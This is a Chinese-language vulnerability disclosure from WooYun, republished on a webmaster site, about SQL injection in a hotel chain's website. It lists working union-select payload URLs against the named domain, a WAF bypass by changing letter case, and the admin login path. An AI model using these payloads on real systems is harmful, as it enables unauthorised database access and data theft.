[公开漏洞]悦来客栈连锁酒店SQL注入漏洞(bypass waf)

    来源:WooYun 浏览:611次 时间:2014-06-23
悦来客栈连锁酒店SQL注入漏洞(bypass waf) 相关厂商: 悦来客栈连锁酒店 漏洞作者:路人甲 提交时间:2014-05-09 17:15 公开时间:2014-06-23 17:15 漏洞类型:SQL注射漏洞 危害等级:低 自评Rank:5 漏洞状态: 未联系到厂商或者厂商积极忽略 漏洞来源:http://www.wooyun.org Tags标签: 无 漏洞详情 披露状态:

2014-05-09:积极联系厂商并且等待厂商认领中,细节不对外公开
2014-06-23:厂商已经主动忽略漏洞,细节向公众公开

简要描述:

http://www.welcomeinn.com.cn/about_yl.asp?id=93
对部分字符做了过滤,比如“'”,对“-”没过滤
还有只是过滤查询语句的小写,大写没过滤
只是手动做了个测试

详细说明:

http://www.welcomeinn.com.cn/about_yl.asp?id=93



M05V0PQB45RKDSSSXSC7@0C.jpg



http://www.welcomeinn.com.cn/about_yl.asp?id=-93

查询一下表段是4

http://www.welcomeinn.com.cn/about_yl.asp?id=93 order by 4

下面联合查询下

http://www.welcomeinn.com.cn/about_yl.asp?id=93 union select 1,2,3,4 from admin



过滤了...

前面他们做的过滤不严,感觉这些应该是,换下字母大小写居然过了...

http://www.welcomeinn.com.cn/about_yl.asp?id=93 UNION SELECT 1,2,3,4 from admin



C~T1BIUG{%_NNEQI@(9NJOR.jpg

漏洞证明:

http://www.welcomeinn.com.cn/about_yl.asp?id=-93



查询一下表段是4

http://www.welcomeinn.com.cn/about_yl.asp?id=93 order by 4

下面联合查询下

http://www.welcomeinn.com.cn/about_yl.asp?id=93 union select 1,2,3,4 from admin



过滤了...

前面他们做的过滤不严,感觉这些应该是,换下字母大小写居然过了...

http://www.welcomeinn.com.cn/about_yl.asp?id=93 UNION SELECT 1,2,3,4 from admin



C~T1BIUG{%_NNEQI@(9NJOR.jpg





http://www.welcomeinn.com.cn/admin/login.asp

登陆后台居然有这么多敏感信息

aa.jpg

修复方案:

过滤不严

版权声明:转载请注明来源 路人甲@乌云 漏洞回应 厂商回应:

未能联系到厂商或者厂商积极拒绝

当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细